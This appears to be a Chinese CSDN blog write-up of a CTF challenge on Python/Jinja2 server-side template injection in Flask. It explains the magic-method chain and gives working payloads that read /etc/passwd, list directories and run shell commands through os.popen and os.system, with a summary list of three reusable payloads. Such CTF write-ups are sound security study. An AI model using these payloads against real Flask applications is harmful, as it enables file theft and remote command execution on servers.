Web_python_template_injection(Python模块注入)

已于 2023-09-03 22:22:59 修改
阅读量1.5k 收藏 12
点赞数 5
分类专栏: web CTF SSTI 文章标签: flask python 模块注入 魔术方法 基类子类
于 2023-04-11 00:39:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/130072619
版权
web 同时被 3 个专栏收录
182 篇文章 22 订阅
订阅专栏
CTF
116 篇文章 20 订阅
订阅专栏
SSTI
5 篇文章 0 订阅
订阅专栏
文章讲述了模板注入的概念,特别是在Jinja2和Flask框架中的应用。通过`render_template_string`的不当使用,可能导致敏感操作如读取文件(如`/etc/passwd`)和执行命令。文章列举了利用`__class__`,`__mro__`,`__subclasses__`等魔术方法来查找和利用类的子类,特别是`<typefile>`和`<classsite._Printer>`类型,用于文件读取和命令执行。最后,文章提供了几个常见的payload示例来展示如何利用这些漏洞。
摘要由CSDN通过智能技术生成

打开链接,提示是Python的模块注入

我们先了解一些基本概念:

 模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易,但是模板引擎也拓宽了我们的攻击面,注入到模板中的代码可能会引发RCE或者XSS。

在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。

flask是使用Jinja2来作为渲染引擎的,网站根目录下的templates文件夹是用来存放html文件,即模板文件。flask的渲染方法有render_template和render_template_string两种,render_template()是用来渲染一个指定的文件的,render_template_string则是用来渲染一个字符串的,不正确的使用flask中的render_template_string方法会引发SSTI。

在使用flask/jinja2 的模板渲染函数 render_template_string 的同时,使用%s 来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。

模板文件并不是单纯的html代码,而是夹杂着模板的语法,因为页面不可能都是一个样子的,有一些地方是会变化的。 

首先我们检测一下是否存在模板注入

{{10+20}}

 可以看到确实被执行了

还是先介绍一些知识

几种常用于ssti的魔术方法:

__class__  返回类型所属的对象

__mro__    返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析

__base__   返回该对象所继承的基类

(__base__和__mro__都是用来寻找基类的)

__subclasses__   每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

__init__  类的初始化方法

__globals__  对包含函数全局变量的字典的引用

__builtins__  builtins就是引用

Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以可以直接调用引用的模块。

在python 里 [] 表示空列表,()表示空元组,{}表示空字典 对字典、列表、元祖的
取值均使用变量名 x[index or key] 的形式。

获取基类的几种方法:
[].__class__.__base__

''.__class__.__mro__[2]

().__class__.__base__

{}.__class__.__base__

request.__class__.__mro__[8]   

[].__class__.__bases__[0]  

获取基本类的子类
[].__class__.__base__.__subclasses__()

我们可以利用的方法有<type 'file'>等(甚至file一般是第40号)

 ().__class__.__base__.__subclasses__()[40]('/etc/passwd').read()

首先我们查找Object类 {{''.__class__.__mro__[?]}}

发现 {{''.__class__.__mro__[2]}} 是Object类

 寻找可用引用 {{''.__class__.__mro__[2].__subclasses__()}}

可以看到有一个type file类型(可以进行文件读取)

尝试利用file类读取文件

[40]是tupe file类型出现位置,前面共有40个逗号,是第四十一个,索引值为 40 , 索引从0开始

{{[].__class__.__base__.__subclasses__()[40]('/etc/passwd').read()}}

 能够正常回显,说明file类执行正常。

试着读取 /flag 类似的文件,服务器返回500,因为不知道具体文件名

但这里还有一个 <class ‘site._Printer’>类型(可以进行命令执行)

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}

[71]为<class ‘site._Printer’>出现位置

知道文件名后我们读取flag

(采用os模块的listdir函数来读取目录,可以配合file来实现任意文件读取)

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}

ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

三个常用payload:

''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('catfl4g').read()


''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].system('ls')


''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()


 


 

Myon⁶
关注
专栏目录
python 模板注入
m0_59485658的博客
12-16 498
web 程序包括两个文件:flask-test.py 和 Config.py 文件kali上搭建有漏洞的flask web服务注:以上代码存在ssti漏洞点在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,我们知道Flask 中使用了Jinja2 作为模板渲染引擎,在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把包裹的内容当做变量解析替换。
web python template injection_攻防世界WEB高手进阶之python_template_injection
weixin_39705193的博客
12-10 137
python模板注入看了一堆文章,也不是看的很明白,反而把题目做出来了大概思路如下简单探测返回说明服务器执行了{{}}里面这一段代码利用{{ config.items() }}可以查看服务器的配置信息读取passwd信息{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}执行成功Python3代码执行下面这一段...
SSTI模版注入(初步)
最新发布
2301_79783285的博客
08-11 620
SSTI模版注入(初步)ssti可能造成任意文件读取和RCE远程控制后台系统漏洞成因:渲染模版时,没有严格控制对用户的输入;使用了危险的模版,导致用户可以混合flask程序进行交互。flask是基于python开发的一种web服务器,那么也就意味着如果用户可以和flask进行交互的话,就可以执行python的代码,比如eval,system,file等等的函数。
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2381
攻防世界,python模板注入
Python模板注入(SSTI)
sleepywin的博客
09-11 898
模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码分离。即也拓宽了攻击面,注入到模板中的代码可能会引发RCE或XSS。攻击者可利用模板注入漏洞执行任意的python代码,包括读取敏感文件、执行系统命令、访问数据库等。通常会通过在用户输入中插入。模板注入漏洞可能导致攻击者能够执行恶意代码或访问未授权的数据。在python中,常见的模板引擎包括。Jinja2中使用{{...}}或{%...%},使得攻击者能够在模板中插入恶意代码。未正确过滤或转义用户提供的输入时。使用模板引擎解析用户提供的输入。
攻防世界之Web_python_template_injectionweb进阶)
my_name_is_sy的博客
06-29 2029
考点为模板漏洞及其利用。
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1198
好难啊
攻防世界CTF Web_python_template_injection
cadandme的博客
02-15 3696
记录模块注入学习过程 题目:Web_python_template_injection提醒是模块注入 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 模块注入测试: 网址输入“{{1*21}}”页面显示21,说面存在“SSTI” 在其他大佬的博客中收集的相关知识: SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对pyt
【攻防世界】十四 --- Web_python_template_injection --- SSTI
qq_43168364的博客
12-27 451
题目 — Web_python_template_injection 考点:SSTI(服务器模板注入) 一、知识点 1. 何为模板注入 模板引擎可以让(网站)程序实现 界面 与 数据 分离,业务代码 与 逻辑代码 的分离,这大大提升了开发效率,良好的设计也使得代码重用变得更加容易。 但是模板引擎也拓宽了我们的攻击面。注入到模板中的代码可能会引发 RCE 或者 XSS 2. flask基础 (1)路由 from flask import flask @app.route('/index/'
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1068
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析
等风来
05-28 5636
2.命令执行注入:攻击者在应用程序中的命令执行语句中注入模板代码,从而执行任意系统命令,获取系统权限,对系统进行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句中注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问题。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句中注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
python模板注入(多种方法,CTF可直接使用)
weixin_47696216的博客
05-21 2115
CTF各种SSTI解题思路与方法
python_template_injection
Alita_lxz的博客
11-27 1311
python模板注入 Web_python_template_injection 文章内很多知识内容为转载大佬博客,都在文章开头处声明了文章原文地址 事情要从一道CTF的题目说起 打开题目,查看源代码,抓包, 扫目录,什么也没发现,只有页面上一行字,python template injection,这个之前也没有做过类似的题目,满脸问号,只得去找wp,通过大佬的wp学习了很多 题目大概这样做,先通过这条语句判断是否存在注入点 http://220.249.52.133:35728为我的题目地址 htt
SSTI(python模板注入)整理
一只懒猫的博客
04-08 482
在使用django框架进行web应用设计时,不规范的代码使用。常用的的dgango代码为:还可以设置动态网址,python使用的web框架可以使用以下方法进行测试。
攻防世界 Web_python_template_injectionflask模版注入
weixin_73399382的博客
07-06 1366
通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)SSTI与这个方法密不可分。
模版注入
不忘初心,护天下安全!
10-08 4749
模版注入 简介 模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。模板引擎通过使用代码构造(如条件语句、循环等)处理上下文数据,允许在模板中使用强大的语言表达式,以呈现动态内容。如果攻击者能够控制要呈现的模板,则他们将能够注入可暴露上下文数据,甚至在服务器上运行任意命令的表达式。 测试方法 确定使用的引擎 查看引擎相关的文档,确定其安全机制以...
Python-模板注入
m0_51428325的博客
12-26 1878
何为模板注入? 模板引擎可以让(网站)程序实现界面与数据分离,业务代码与逻辑代码的分离,哲大大提升了开发效率,良好的设计也是的代码重用变得更加容易。 到那时模板引擎也拓宽了我们的攻击面,注入到模板中的代码可能会引发RCE或者XSS flask基础 在学习SSTI之前,先把flask的运作流程搞明白,这样有利于更加快速的理解原理 路由 先看一段代码 from flask import flask @app.route('/index/') def hello_word(): .
python模板注入
RoboTerh的博客
08-05 934
ssti漏洞 其漏洞的产生在于render_template_string函数在渲染模板的时候使用了%s来动态的替换字符串,而且Flask模板中使用了Jinja2作为模板渲染引擎,{{}}在Jinja2中作为变量包裹标识符,在渲染的时候将{{}}包裹的内容作为变量解析替换。 漏洞的解决方式: 将template中的<h3>%s!</h3>%url更改为<h3>{{url}}</h3> 这样以来,Jinja2在模板渲染的时候将url的值替换掉{{url}},
攻防世界web_python_template_injection
03-16
攻防世界中的web_python_template_injection是一种Web应用程序漏洞,它允许攻击者通过注入恶意代码来执行任意操作。这种漏洞通常出现在使用Python模板引擎的Web应用程序中,攻击者可以通过注入Python代码来执行任意操作,例如读取文件、执行命令等。为了防止这种漏洞,开发人员应该对输入进行严格的过滤和验证,以确保输入不包含任何恶意代码。同时,使用最新版本的Python模板引擎和Web框架也可以帮助减少这种漏洞的风险。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值